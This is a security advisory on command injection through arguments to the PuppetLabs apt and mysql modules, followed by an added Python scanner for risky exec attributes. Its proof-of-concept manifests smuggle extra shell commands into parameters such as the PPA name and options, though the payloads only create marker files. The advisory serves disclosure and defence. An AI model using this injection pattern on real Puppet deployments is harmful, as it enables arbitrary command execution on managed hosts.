Puppetlabs: Command injection via module arguments

High
rcorrea35 published GHSA-9jvw-qr6w-9wvc Oct 6, 2022

Package

Enterprise (Puppetlabs)

Affected versions

2017.3

Patched versions

None

Description

Summary

Running interpreted shell commands without sanitization allows command-line injection in multiple PuppetLabs modules via module arguments.

Severity

High - Insufficient data validation allows command injection in multiple modules.

Proofs of Concept

puppetlabs-apt/manifests/ppa.pp:86

command => "/usr/bin/add-apt-repository ${options} ${name} || (rm ${::apt::sources_list_d}/${sources_list_d_filename} && false)",

PoC injection via the name variable:

include apt
apt::ppa { 'ppa:x||touch INJECTION2||': }

The issue was reproduced by putting the PoC into test.pp, running puppet apply --debug test.pp, and verifying that a file called INJECTION2 was created.

PoC injection via the options variable:

include apt
apt::ppa { 'ppa:x': options => '||touch INJECTION||' }

puppetlabs-apt/manifests/mark.pp

PoC: apt::mark { 'x;touch INJECTION3': setting => auto }

puppetlabs-mysql/manifests/db.pp:103

  • Code: command => "${import_cat_cmd} ${sql_inputs} | mysql ${dbname}"
  • Affected parameters: $sql, $dbname (defaults to $name). Note: import_cat_cmd is also affected, but that is probably intended.

puppetlabs-mysql/manifests/server/config.pp

mysql::server::options["mysqld"]["tmpdir"] = "||touch INJECTION||" (not verified)

puppetlabs-mysql/manifests/server/root_password.pp:32

mysql::server::install_secret_file

puppetlabs-mysql/manifests/server/service.pp:57

mysql::server::options["mysqld"]["socket"]
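
An added example, not part of the advisory or of the PuppetLabs modules: a small Python check that scans manifest text for exec-style attributes (command, onlyif, unless) whose double-quoted value interpolates variables, which is the pattern in the ppa.pp and db.pp lines above. The function name, the trusted parameter and the sample manifest are assumptions made for the example.

```python
import re

# Exec attributes whose value Puppet hands to a command runner.
EXEC_ATTRS = ("command", "onlyif", "unless")
# attr => "double-quoted value"; single-quoted Puppet strings never interpolate.
ATTR_RE = re.compile(
    r'\b(%s)\s*=>\s*"((?:\\.|[^"\\])*)"' % "|".join(EXEC_ATTRS), re.S)
# ${name}, ${::scope::name} or bare $name, unless the dollar is backslash-escaped.
VAR_RE = re.compile(
    r'(?<!\\)\$(?:\{\s*([^}]+?)\s*\}|((?:::)?[a-z_]\w*(?:::\w+)*))')


def find_interpolated_commands(manifest, trusted=()):
    """Return (line, attribute, [variables]) for each exec-style attribute whose
    double-quoted value interpolates a variable not listed in `trusted`."""
    findings = []
    for m in ATTR_RE.finditer(manifest):
        names = [a or b for a, b in VAR_RE.findall(m.group(2))]
        risky = [n for n in names if n not in trusted]
        if risky:
            line = manifest.count("\n", 0, m.start()) + 1
            findings.append((line, m.group(1), risky))
    return findings


# Constructed manifest: the two command strings are quoted from the advisory,
# the surrounding resources are made up for the example.
SAMPLE = r'''
exec { "add-apt-repository-${name}":
  command => "/usr/bin/add-apt-repository ${options} ${name} || (rm ${::apt::sources_list_d}/${sources_list_d_filename} && false)",
}
exec { "${dbname}-import":
  command => "${import_cat_cmd} ${sql_inputs} | mysql ${dbname}",
}
exec { 'static':
  command => '/usr/bin/apt-get update',
  unless  => "/usr/bin/test -f /tmp/\${literal}",
}
'''

if __name__ == "__main__":
    # import_cat_cmd is listed as trusted because the advisory calls it intended.
    hits = find_interpolated_commands(SAMPLE, trusted=("import_cat_cmd",))
    for line, attr, names in hits:
        print(f"line {line}: {attr} interpolates {', '.join(names)}")
```

Each finding is a review prompt, not a verdict: the reviewer still has to confirm whether the interpolated value is validated or escaped before it reaches the shell.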

Further Analysis

Remediation Guidelines:
#1 puppetlabs/puppetlabs-apt@c26ad2a - Aug 18
#2 puppetlabs/puppetlabs-apt@eed10ea - Aug 12
#3 puppetlabs/puppetlabs-mysql@547483f - Aug 22
#4 puppetlabs/puppetlabs-mysql@1c1291d - Aug 22
#5 puppetlabs/puppetlabs-mysql@90168d9 - Aug 23
#6 puppetlabs/puppetlabs-mysql@cdaa839 - Aug 19

Timeline

Date reported: 08/08/2022
Date fixed: 08/23/2022
Date disclosed: 10/06/2022

Severity

High

CVE ID

CVE-2022-3275

Weaknesses

No CWEs

Credits